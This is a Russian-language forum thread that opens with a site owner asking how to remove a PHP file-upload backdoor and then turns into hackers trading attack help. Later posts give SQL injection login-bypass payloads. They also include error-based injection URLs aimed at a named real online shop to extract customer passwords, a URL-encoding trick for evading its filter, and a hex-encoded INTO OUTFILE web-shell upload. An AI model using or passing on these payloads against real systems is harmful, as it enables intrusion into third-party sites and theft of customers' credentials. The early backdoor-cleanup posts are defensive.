дыра на сервере / сайте В общем какая-то зараза залезла на сервер. Создает переодически(?) различные файлы типа class.php / main.php / и другие интересные названия. Раньше еще редиректы прописывало в .htaccess, но это я поправил изменением прав (такая вот заплатка). А еще оно делает файл с вот таким содержимым: PHP: <? if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); Exit;} if ($_FILES['F1l3']) { move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['Name']); echo 'OK'; } else { echo 'You are forbidden!'; } ?> Искал и айболитом и с помощью: find ./ -name '*.php' | xargs grep -E '[0-9a-zA-Z/]{80}' > viruses.txt что-то находил, что-то удалял, но пока не помогло. чего еще сотворить? эта зараза лезет не в конкретную cms, хотя я раньше думал, что так. На данный момент создает эти файлы тупо в корне сайта. До этого они проявлялись в самых далеких местах, после вчерашней чистки пока только в корне.
посмотрите даты изменения файлов, бэкдоры вида <? eval($_GET[q]); ?>, конфигурацию всего сервера (устаревшая? вомзожно стоит накатить секурные апдейты?), если cms, тоже обновить. также изучайте логи и смотрите, куда имеено залились. ну и конечно, советую обратиться к спецалисту, например вот
Сколько у вас сайтов на одном аккаунте? если несколько то их все разом чистить надо, но читска, как токовой не устронит проблему, нужно искать ее корень и проводить профилактические меры по предотвращению подобных ситуаций!
чем же можно зашифровать данные поступающие в базу ? кроме пароля открытые остаются email - они же логины, телефоны, номера карт например и нужно что бы эти данные из базы могла расшифровать только функция в скрипте принимающая и обрабатывающая данные. данные хранятся в шифрованом виде
возможно ли зашифровать передачу скрытого ssid для wifi точки, что бы его нельзя было перехватить ? шифрование точки: WPA-PSK/WPA2-PSK зашифровать так же как и пароль wifi точки !
Создаю пост запрос: login=Admin'+--+\&pass=123 Слэш вызывает ошибку: WHERE `login` = 'Admin' -- \' AND `password` = '202cb962ac59075b964b07152d234b70' LIMIT 1 Слэш убираю, а авторизация не проходит. Ощущение, что ' -- ' не комментирует. Пробовал /* в ответной ошибке остается только *. Подскажите что еще можно попробовать? P.S. Пробовал.(
пробовали с комбинацией OR? http://www.securityidiots.com/Web-Pentest/SQL-Injection/bypass-login-using-sql-injection.html
Code: login=Admin'+or+login+='[B]bad_login_name[/B]&pass=[B]any[/B] bad_login_name - любой логин кроме необходимого, к которому не подходит пасс any
Не помогло. В исходном коде введенные мною кавычки выглядят как & # 039; только без пробела. Это играет роль?
кавычки не экранируются и не фильтруются. попробуйте Code: SELECT * FROM users WHERE `login` = 'Admin' AND `password` = '1' OR '1'='1' -- это равносильно запросу Code: SELECT * FROM users WHERE login='Admin' AND TRUE поэтому будет выборка из таблицы, где значение колонки login == Admin.
Есть Error based Injection. Нужные данные находятся в соседней бд, при запросе "select pass from users" все выводит норм, при запросе "select table_name from+information_schema.tables" - все норм Но когда пытаешься вытащить данные(таблицы и колонки вытягивает норм) с соседней бд срабатывает защита: "select pass2 from нужнаяБД.users". Примечательно, но и когда выполняешь запрос типа "select pass from БДвкоторойсижу.users" так же срабатывает защита. Подумал бы что дело в "." между бд и ьаблицей, но с information_schema вытягивает ведь. Застопорился, что можно попробовать? норм HTML: _http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+customers+limit+0,1))))=1 ошибка HTML: http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+formaggiodb_osc.customers+limit+0,1))))=1
действительно фильтр на имя бд. помогло урл кодирование: Code: http://www.formaggiokitchen.com/shop/product_info.php?products_id=792+or(ExtractValue(1,concat(0x3a,(select+mid(customers_password,1,31)+from+forma%67%67iodb_osc.customers+limit+0,1))))=1 где %6767 = gg, то есть имя бд formaggiodb_osc
Как залить шелл при sql-иъекции. Права file_priv есть. Могу читать файлы. делаю 1+union+select+0,1,0x3C3F7068702073797374656D28245F4745545B63293B203F3E+INTO+OUTFILE+'/tmp/1.txt' -- Файл не заливается. По ходу дела фильтрация на кавычки. Как обойти и залить шелл?